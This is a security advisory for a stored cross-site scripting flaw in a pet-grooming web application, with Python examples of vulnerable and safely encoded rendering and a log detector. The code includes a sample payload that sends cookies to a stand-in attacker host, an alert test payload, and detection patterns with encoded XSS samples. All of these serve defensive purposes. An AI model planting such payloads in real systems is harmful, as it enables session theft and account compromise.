CVE-2025-61087

6.1 MEDIUM

📋 TL;DR

This CVE describes a stored cross-site scripting (XSS) vulnerability in SourceCodester Pet Grooming Management Software 1.0. Attackers can inject malicious scripts via the Customer Name field in the Customer Management section, which are then executed when other users view the affected pages. Organizations using this specific software version are affected.

💻 Affected Systems

Products:
  • SourceCodester Pet Grooming Management Software
Versions: 1.0
Operating Systems: Any OS running the web application
Default Config Vulnerable: ⚠️ Yes
Notes: The vulnerability exists in the default installation and requires no special configuration to be exploitable.

📦 What is this software?

A small web application for running a pet-grooming business, distributed as free source code on sourcecodester.com. It includes a Customer Management section in which customer records, including the Customer Name field affected by this CVE, are created and later displayed to other users of the application.

⚠️ Risk & Real-World Impact

🔴

Worst Case

Attackers could steal administrator or user session cookies, perform actions on behalf of authenticated users, deface the application, or redirect users to malicious sites.

🟠

Likely Case

Attackers inject malicious scripts to steal session cookies or credentials from users who view customer records, potentially leading to account compromise.

🟢

If Mitigated

With proper input validation and output encoding, malicious scripts are neutralized before execution, preventing exploitation.

🌐 Internet-Facing: HIGH
🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: LIKELY
Unauthenticated Exploit: ✅ No
Complexity: LOW

Exploitation requires an account that can create or modify customer records; the stored payload then executes in the browser of every user, including administrators, who views those records.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Unknown

Vendor Advisory: Not available

Restart Required: No

Instructions:

No official patch is available at the time of writing. Apply server-side input validation and context-aware output encoding in the application code as a workaround.

🔧 Temporary Workarounds

Implement Input Validation (applies to: all platforms)

Add server-side validation that rejects or sanitizes input to the Customer Name field (for example, an allow-list of letters, spaces, apostrophes, hyphens and periods with a length limit). Validation is defence in depth; it does not replace output encoding.

Implement Output Encoding (applies to: all platforms)

Encode user-controlled data for the context it is rendered in (HTML-entity encoding for HTML body and attribute values, URL encoding for query parameters, a JSON/JavaScript string literal for inline script) before it reaches the page, so a stored name can never be interpreted as markup or script.
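The following is an added illustration of the two workarounds above, not code from the Pet Grooming Management Software itself; the page does not state the application's implementation language, so it is shown in Python. The renderer and validator names, the row layout and the stored sample value are assumptions. It places the vulnerable concatenation pattern beside a hardened renderer that encodes per output context (HTML text, URL query, inline JavaScript), plus an allow-list validator for the Customer Name field.

```python
import html
import json
import re
from urllib.parse import quote

# Constructed sample value of the kind the advisory describes being stored in
# the Customer Name field. The exfiltration host is a placeholder, not a real
# indicator.
STORED_NAME = (
    "Fluffy <script>document.location='http://attacker.example/?c='"
    "+document.cookie</script>"
)


def render_customer_row_vulnerable(name: str) -> str:
    """The vulnerable pattern: the stored value is concatenated straight into
    HTML (twice here: a table cell and a link), so a name containing markup
    becomes markup in every viewer's browser."""
    return (
        f"<tr><td>{name}</td>"
        f"<td><a href='/customer/edit?name={name}'>edit</a></td></tr>"
    )


def render_customer_row_safe(name: str) -> str:
    """Hardened pattern: encode for the context the value lands in.
    - HTML text and quoted attribute values: html.escape (escapes < > & " ')
    - URL query component: quote(..., safe='') so '&', '=' and '/' inside the
      name cannot smuggle extra parameters or path segments."""
    return (
        f"<tr><td>{html.escape(name)}</td>"
        f"<td><a href='/customer/edit?name={quote(name, safe='')}'>edit</a></td></tr>"
    )


def render_js_literal_safe(name: str) -> str:
    """When the name must be handed to inline JavaScript, emit it as a JSON
    string literal and additionally escape < > & as \\uXXXX so the data can
    never contain a literal '</script' (the HTML parser ends a script block at
    the first one it sees, regardless of JavaScript quoting)."""
    literal = (
        json.dumps(name)
        .replace("<", "\\u003c")
        .replace(">", "\\u003e")
        .replace("&", "\\u0026")
    )
    return f"<script>var customerName = {literal};</script>"


# Defence in depth, not a substitute for output encoding: an allow-list for the
# Customer Name field (Unicode letters/digits, space, apostrophe, hyphen,
# period, 1-100 characters). Assumed policy; adjust to the business's needs.
_NAME_RE = re.compile(r"[\w .'\-]{1,100}")


def validate_customer_name(name: str) -> bool:
    return _NAME_RE.fullmatch(name) is not None


def script_tag_count(rendered: str) -> int:
    """Number of literal '<script' openings in rendered output. Data must never
    contribute any; render_js_literal_safe contributes exactly its own one."""
    return rendered.lower().count("<script")


if __name__ == "__main__":
    print("vulnerable:", render_customer_row_vulnerable(STORED_NAME))
    print("safe      :", render_customer_row_safe(STORED_NAME))
    print("js literal:", render_js_literal_safe(STORED_NAME))
    print("validates :", validate_customer_name(STORED_NAME))
```

The point of the three encoders is that one function does not fit all contexts: HTML-entity encoding inside a `href` query still lets `&` and `=` add parameters, and entity encoding inside a `<script>` block does nothing at all, which is why the JavaScript case uses a JSON literal with angle brackets escaped.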

🧯 If You Can't Patch

  • Restrict access to the Customer Management section to trusted users only.
  • Implement a web application firewall (WAF) with XSS protection rules.

🔍 How to Verify

Check if Vulnerable:

In a test instance (the payload is stored, so it persists in the database until the record is deleted), enter a simple payload such as <script>alert('XSS')</script> in the Customer Name field, save the record, then open every page that displays customer names. If the alert fires, or the page source shows the <script> tag unencoded rather than as &lt;script&gt;, the instance is vulnerable. Remove the test record afterwards.

Check Version:

Check the software version in the application's admin panel or configuration files.

Verify Fix Applied:

After implementing fixes, re-enter the same payload and view the page source of each page that displays the Customer Name: the stored value should appear encoded (for example &lt;script&gt;) and no script should execute. Check every display location, not only the one originally tested, since output encoding has to be applied at each one.

📡 Detection & Monitoring

Log Indicators:

  • Unusual characters or script tags in customer name fields in application logs.

Network Indicators:

  • HTTP requests containing script tags or JavaScript code in POST parameters to customer management endpoints.

SIEM Query:

Search for POST requests to customer management URLs containing patterns like <script> or javascript: in the request body.
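An added example of the detection logic described above, run over constructed sample records; it is not part of the original page and not a query for any particular SIEM. The record format (one JSON object per line with ts, client, method, path and body fields, as a reverse proxy or WAF that logs request bodies might emit), the /customer_management paths and the timestamps are assumptions. It goes beyond the one-line query in the text in one respect a practitioner needs: it URL-decodes the body (repeatedly, to catch double encoding) and HTML-entity-decodes it before matching, because a raw search for <script> never sees %3Cscript%3E.

```python
import json
import re
from html import unescape
from urllib.parse import unquote_plus

# Indicator patterns applied to the decoded request body; names appear in results.
XSS_PATTERNS = [
    ("script_tag", re.compile(r"<\s*script\b", re.I)),
    ("event_handler", re.compile(r"\bon[a-z]+\s*=", re.I)),        # onerror=, onload=, ...
    ("javascript_uri", re.compile(r"javascript\s*:", re.I)),
    ("active_element", re.compile(r"<\s*(img|svg|iframe|object|embed)\b", re.I)),
]

# Assumption: customer-management routes contain "customer"; adjust to the
# deployment's real route names (or drop the filter to scan every endpoint).
CUSTOMER_PATH = re.compile(r"customer", re.I)


def normalize(value: str) -> str:
    """Undo the encodings a payload travels through before matching: URL-decode
    until stable (bounded, catches double encoding such as %253C), then decode
    HTML entities. Matching the raw body would miss %3Cscript%3E entirely."""
    previous, current = None, value
    for _ in range(3):
        if current == previous:
            break
        previous, current = current, unquote_plus(current)
    return unescape(current)


def find_xss_indicators(record: dict) -> list:
    """Indicator names for one POST to a customer-management endpoint; an empty
    list for anything out of scope or benign."""
    if record.get("method") != "POST" or not CUSTOMER_PATH.search(record.get("path", "")):
        return []
    body = normalize(record.get("body", ""))
    return [name for name, pattern in XSS_PATTERNS if pattern.search(body)]


def scan_log(lines) -> list:
    """Scan JSON-per-line request records; return (ts, client, path, indicators) per hit."""
    hits = []
    for line in lines:
        if not line.strip():
            continue
        record = json.loads(line)
        indicators = find_xss_indicators(record)
        if indicators:
            hits.append((record["ts"], record["client"], record["path"], indicators))
    return hits


# Constructed sample log (not real traffic). Line 1 is a benign record; lines
# 2-4 are encoded, double-encoded and javascript: payloads against the customer
# endpoints; line 5 carries a payload but targets a path outside the filter.
SAMPLE_LOG = """
{"ts":"2025-10-01T09:00:01Z","client":"10.0.0.5","method":"POST","path":"/customer_management/add","body":"name=Fluffy+O%27Brien&phone=555-0100"}
{"ts":"2025-10-01T09:02:14Z","client":"10.0.0.9","method":"POST","path":"/customer_management/add","body":"name=%3Cscript%3Ealert(1)%3C%2Fscript%3E"}
{"ts":"2025-10-01T09:03:40Z","client":"10.0.0.9","method":"POST","path":"/customer_management/edit?id=7","body":"name=%253Cimg+src%3Dx+onerror%3Dalert(1)%253E"}
{"ts":"2025-10-01T09:04:02Z","client":"10.0.0.9","method":"POST","path":"/customer_management/add","body":"name=%3Ca+href%3D%22javascript%3Aalert(1)%22%3Ex%3C%2Fa%3E"}
{"ts":"2025-10-01T09:05:30Z","client":"10.0.0.7","method":"POST","path":"/login.php","body":"username=%3Cscript%3E&password=x"}
""".strip().splitlines()

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

Two tuning notes: the event-handler pattern will also fire on legitimate field names such as "once=" or "online=", so review hits against the form's real parameter names; and because this is stored XSS, a single hit from one client is significant even without any follow-on activity from that client, since the victims are the users who later view the record.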
